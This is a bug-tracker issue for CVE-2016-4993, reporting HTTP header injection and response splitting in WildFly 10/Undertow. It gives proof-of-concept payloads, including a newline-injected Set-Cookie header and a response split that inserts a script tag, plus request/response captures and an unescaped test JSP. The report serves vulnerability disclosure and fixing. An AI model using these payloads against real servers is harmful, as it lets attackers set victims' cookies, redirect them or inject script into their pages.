Uploaded image for project: 'Undertow'
  1. Undertow
  2. UNDERTOW-827

EMBARGOED CVE-2016-4993 wildfly: HTTP header injection / response splitting

    Details

    • Security Sensitive Issue:
      This issue is security relevant
    • Steps to Reproduce:
      Hide

      NOTE: The following discussion mentions Spring specifically however one can exploit using jsp.

      Internal RH testing was based on the following jsp

      <%
      if (request.getParameter("WELCOME") == null)

      { out.println("Please enter the welcome string"); }

      else

      { out.println("Hello <b>"+request. getParameter("WELCOME")+"</b>!"); }

      %>

      With the following payload

      http://localhost:8080/Test1.war/?WELCOME=language=en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!

      Now the specific report:
      ========================

      WildFly/Undertow vulnerable to HTTP header injection/Response Splitting
      -----------------------------------------------------------------------

      The WildFly 10.0.0 Application Server/Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also Response Splitting, due to insufficient sanitisation and validation of user input before the input is used as part of a HTTP header value.

      The PoC described below was derived from code at: http://www.mkyong.com/spring-mvc/spring-mvc-internationalization-example. [Open URL] The code was packaged as a .war file (apart from Jetty) and hosted directly on the following servlet engines for comparison:

      • Jetty 9.2.11.v20150529
      • Tomcat 8.0.35
      • WildFly 10.0.0.Final

      The pom.xml file used in the actual PoC is shown at the bottom of this document

      Systems affected:
      -----------------

      WildFly AS 10.0.0.Final / Undertow 1.3.15.Final

      Host machine:
      -------------

      Linux ubuntu 3.16.0-71-generic #92~14.04.1-Ubuntu SMP Thu May 12 23:31:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
      DISTRIB_ID=Ubuntu
      DISTRIB_RELEASE=14.04
      DISTRIB_CODENAME=trusty
      DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"

      Description
      -----------

      Using a simple Spring MVC web application as a PoC (original here: http://www.mkyong.com/spring-mvc/spring-mvc-internationalization-example), [Open URL] it was observed that the WildFly Application Server/Undertow does not sanitise or strip newline characters before using them as part of a HTTP header. This behavior is in contrast to other JSP servlet engines tested with the same PoC code (currently Jetty 9.2.11.v20150529 and Tomcat 8.0.35), where the newline characters are removed and it is not possible to split or inject headers.

      In the case of the PoC the org.springframework.web.servlet.i18n.LocaleChangeInterceptor is used to set a header value to that of a user supplied input, to determine the language of the page and the correct internationalization message to display.

      Using newline characters injected into the HTTP headers, it is possible for the malicious user to add arbitrary headers such as Set-Cookie to set arbitrary cookies, or potentially use a Location header for an open-redirect. By using two newline characters the attacker can 'split' the response (HTTP Response Splitting) and provide their own content that will be rendered to the victim user.

      Payloads:
      ---------

      Set-Cookie payload - en%0ASet-Cookie:MyCookieValue

      GET http://127.0.0.1:8888/SpringMVC/welcome.htm?language=en%0ASet-Cookie:MyCookieValue [Open URL] HTTP/1.1
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
      Accept-Language: en-US,en;q=0.5
      Cookie: JSESSIONID=jMNTfT-G_4QIwx8keYJtrFfmskg_Y6-lgQVuBlCx.ubuntu; __utma=96992031.883573134.1464252632.1464252632.1464252632.1; __utmz=96992031.1464252632.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
      Connection: keep-alive
      Host: 127.0.0.1:8888

      HTTP/1.1 200 OK
      Connection: keep-alive
      X-Powered-By: Undertow/1
      X-Powered-By: JSP/2.3
      Server: WildFly/10
      Content-Type: text/html;charset=UTF-8
      Content-Length: 290
      Content-Language: en
      set-cookie: mycookievalue-
      Date: Fri, 03 Jun 2016 15:44:10 GMT

      Response Splitting payload - en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!--

      GET http://127.0.0.1:8888/SpringMVC/welcome.htm?language=en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!-- [Open URL] HTTP/1.1
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
      Accept-Language: en-US,en;q=0.5
      Cookie: mycookievalue-; JSESSIONID=jMNTfT-G_4QIwx8keYJtrFfmskg_Y6-lgQVuBlCx.ubuntu; __utma=96992031.883573134.1464252632.1464252632.1464252632.1; __utmz=96992031.1464252632.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
      Connection: keep-alive
      Host: 127.0.0.1:8888

      HTTP/1.1 200 OK
      Connection: keep-alive
      X-Powered-By: Undertow/1
      X-Powered-By: JSP/2.3
      Server: WildFly/10
      Content-Type: text/html;charset=UTF-8
      Content-Length: 341
      Content-Language: en

      Show
      NOTE: The following discussion mentions Spring specifically however one can exploit using jsp. Internal RH testing was based on the following jsp <% if (request.getParameter("WELCOME") == null) { out.println("Please enter the welcome string"); } else { out.println("Hello <b>"+request. getParameter("WELCOME")+"</b>!"); } %> With the following payload http://localhost:8080/Test1.war/?WELCOME=language=en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C ! Now the specific report: ======================== WildFly/Undertow vulnerable to HTTP header injection/Response Splitting ----------------------------------------------------------------------- The WildFly 10.0.0 Application Server/Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also Response Splitting, due to insufficient sanitisation and validation of user input before the input is used as part of a HTTP header value. The PoC described below was derived from code at: http://www.mkyong.com/spring-mvc/spring-mvc-internationalization-example . [Open URL] The code was packaged as a .war file (apart from Jetty) and hosted directly on the following servlet engines for comparison: Jetty 9.2.11.v20150529 Tomcat 8.0.35 WildFly 10.0.0.Final The pom.xml file used in the actual PoC is shown at the bottom of this document Systems affected: ----------------- WildFly AS 10.0.0.Final / Undertow 1.3.15.Final Host machine: ------------- Linux ubuntu 3.16.0-71-generic #92~14.04.1-Ubuntu SMP Thu May 12 23:31:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux DISTRIB_ID=Ubuntu DISTRIB_RELEASE=14.04 DISTRIB_CODENAME=trusty DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS" Description ----------- Using a simple Spring MVC web application as a PoC (original here: http://www.mkyong.com/spring-mvc/spring-mvc-internationalization-example ), [Open URL] it was observed that the WildFly Application Server/Undertow does not sanitise or strip newline characters before using them as part of a HTTP header. This behavior is in contrast to other JSP servlet engines tested with the same PoC code (currently Jetty 9.2.11.v20150529 and Tomcat 8.0.35), where the newline characters are removed and it is not possible to split or inject headers. In the case of the PoC the org.springframework.web.servlet.i18n.LocaleChangeInterceptor is used to set a header value to that of a user supplied input, to determine the language of the page and the correct internationalization message to display. Using newline characters injected into the HTTP headers, it is possible for the malicious user to add arbitrary headers such as Set-Cookie to set arbitrary cookies, or potentially use a Location header for an open-redirect. By using two newline characters the attacker can 'split' the response (HTTP Response Splitting) and provide their own content that will be rendered to the victim user. Payloads: --------- Set-Cookie payload - en%0ASet-Cookie:MyCookieValue GET http://127.0.0.1:8888/SpringMVC/welcome.htm?language=en%0ASet-Cookie:MyCookieValue [Open URL] HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9, / ;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: JSESSIONID=jMNTfT-G_4QIwx8keYJtrFfmskg_Y6-lgQVuBlCx.ubuntu; __utma=96992031.883573134.1464252632.1464252632.1464252632.1; __utmz=96992031.1464252632.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) Connection: keep-alive Host: 127.0.0.1:8888 HTTP/1.1 200 OK Connection: keep-alive X-Powered-By: Undertow/1 X-Powered-By: JSP/2.3 Server: WildFly/10 Content-Type: text/html;charset=UTF-8 Content-Length: 290 Content-Language: en set-cookie: mycookievalue- Date: Fri, 03 Jun 2016 15:44:10 GMT Response Splitting payload - en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!-- GET http://127.0.0.1:8888/SpringMVC/welcome.htm?language=en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!-- [Open URL] HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9, / ;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: mycookievalue-; JSESSIONID=jMNTfT-G_4QIwx8keYJtrFfmskg_Y6-lgQVuBlCx.ubuntu; __utma=96992031.883573134.1464252632.1464252632.1464252632.1; __utmz=96992031.1464252632.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) Connection: keep-alive Host: 127.0.0.1:8888 HTTP/1.1 200 OK Connection: keep-alive X-Powered-By: Undertow/1 X-Powered-By: JSP/2.3 Server: WildFly/10 Content-Type: text/html;charset=UTF-8 Content-Length: 341 Content-Language: en

      Description

      It was reported that WildFly 10.0.0 Application Server/Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also Response Splitting, due to insufficient sanitisation and validation of user input before the input is used as part of a HTTP header value.

      Using newline characters injected into the HTTP headers, it is possible for the malicious user to add arbitrary headers such as Set-Cookie to set arbitrary cookies, or potentially use a Location header for an open-redirect. By using two newline characters the attacker can 'split' the response (HTTP Response Splitting) and provide their own content that will be rendered to the victim user.

      Refer to https://bugzilla.redhat.com/show_bug.cgi?id=1344321

      This issue is currently embargoed.

        Gliffy Diagrams

          Attachments

            Issue Links

              Activity

                People

                • Assignee:
                  swd847 Stuart Douglas
                  Reporter:
                  twalsh1 Tim Walsh
                • Votes:
                  0 Vote for this issue
                  Watchers:
                  2 Start watching this issue

                  Dates

                  • Created:
                    Updated:
                    Resolved: